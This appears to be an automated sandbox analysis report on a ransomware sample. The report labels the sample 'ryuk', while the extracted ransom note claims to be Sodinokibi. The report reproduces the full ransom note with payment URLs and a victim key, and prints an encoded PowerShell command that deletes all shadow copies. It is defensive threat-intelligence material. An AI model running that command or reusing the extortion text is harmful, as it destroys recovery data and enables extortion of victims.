Analysis

  • max time kernel
    155s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 01:19

General

  • Target

    adb04b12fad7b0259d47de69a9879dd27bb5dcb515927b2ca1efb32455262be2.exe

  • Size

    164KB

  • MD5

    dfd259d08b2acbb8a739005cd1c93dad

  • SHA1

    51da92f6e295b15ac5f883d4aa74a0e71ca3efdd

  • SHA256

    adb04b12fad7b0259d47de69a9879dd27bb5dcb515927b2ca1efb32455262be2

  • SHA512

    ef04dfe9b2d86d6a8d23c2bfd3474ead2a962803e9b55518399a97ffd8689f0cf7851d2df2cf3bef89224546eb9856055513404766cde3a36693f84cc69c9059

Score
10/10

Malware Config

Extracted

Path

C:\870pevdn-readme.txt

Family

ryuk

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 870pevdn. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. I suggest you read about us on the Internet, we are known as "Sodinokibi Ransomware" , for example, this article: https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread Pay attention to that: "How Much Data Is Decrypted with a Ransomware Decryptor? In Q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. This statistic varied dramatically depending on the ransomware type. For example, Ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while Sodinokibi was close to 100%. " Now you have a guarantee that your files will be returned 100 %. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/992DDABA077C2044 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/992DDABA077C2044 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: X+ODqxWxkErWvoSqK+wsOWnAAy6E84Ry9E8ACfj/B3VfJv6+v747ZO3VNaY/fdf4 NGwAeUcIjimODHNhu/SFRbP2AB3srOPsAUzCEg47ctoJ6s/vTdp/4ep6bHGYr0pD y15B+s6AjGqxQWmclpGEPn6IYjVrR2lg/vWUnh/kZjiWGEed/m6XjCiFUdgaDe7D ma4fj94qyty6MHAUBctwQH8Ql17a1wXLBCGtFyvxRaCBhzh0LOF0XwQfOwFnxP8t e1wP2ZEGSJDEfQ7dr33oWT1XpysK6JC9N0uEfLXBxlsXpi97ot9alq57d3hy4DwB GDj/kmF6KiuqEbTi5ZfY+qAGc6C+44Ax4TToZqY/jt+/ToxBK8Mcln1ki9YCzc1a zMGViG4fT8ATr9Cg9T/KRToqMnzR0/P6pDkRr1STMH39orZCXA2XETSIFvCcfed8 BTMCpfGFOXFTfPHbPYWNYZEnp404kK+HEqYumASpf0L2bGuBxwYCVDrrtSr2rJ1d 6MmUTfpHQFr5hkaNpDPLomRoWUNiVejANhcArNNEuGfjiSNUtrgZ6E2BZrataeTE CQoQY8CR1OtBWBGK9wChLmQxHNYu9FojyHBRCAYXbyrwax0AYuFBmlftyJi1O6u3 IgLaJc6k0W9hLutm+m4VNKHf23/Yn7BUhC9pJm50s/I534pf5HJxl6tE/DPj4IC5 ePQJK6a6NDyhK1XrwS7LgkXYc+6vXmMYvAkKNp4Pcz3AKAVrh9e3LsQmlqNFIOP8 y0lthHiNdQn19dCWBZCuF70rA9+f6yNZbUsJ4RoGUsQ1Hv18nRmK7/BWHqZj4VMV r9TeMx1672twdSxeKRdGxzDAMgmMKYhTw5oLD62DwSHIhvmYYITG9VlpHLzfTEkZ D78HZlnalXhCCe9rFxqkECv1x2Iux7/CVgEUUMQ+1gy/XULxkSQrhMXAIZi/w9e0 BIXbgkCA7HjgMMsa2H7xIELlHLP6th61wAqHvmr6xy2jYuX0ObfSA5o5lX7DR7Ri DtLrRIETEYuuwVZ8ffqPAU02rCzDxVDmGgaTlZ2lltge9JXABJrWJRB9CRcLUVVc FbMZxjl0G3iarRPqe3+Bb+8u8lL7OZ5sN0RWKek9NWw7GEoiqFRKBDLXbxKtAiuC Extension name: 870pevdn ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/992DDABA077C2044

http://decryptor.top/992DDABA077C2044

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\adb04b12fad7b0259d47de69a9879dd27bb5dcb515927b2ca1efb32455262be2.exe
    "C:\Users\Admin\AppData\Local\Temp\adb04b12fad7b0259d47de69a9879dd27bb5dcb515927b2ca1efb32455262be2.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3880
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3588
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:920

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3880-119-0x000001CCD6080000-0x000001CCD60A2000-memory.dmp
      Filesize

      136KB

    • memory/3880-120-0x000001CCD5F70000-0x000001CCD5F72000-memory.dmp
      Filesize

      8KB

    • memory/3880-121-0x000001CCD5F73000-0x000001CCD5F75000-memory.dmp
      Filesize

      8KB

    • memory/3880-124-0x000001CCD6230000-0x000001CCD62A6000-memory.dmp
      Filesize

      472KB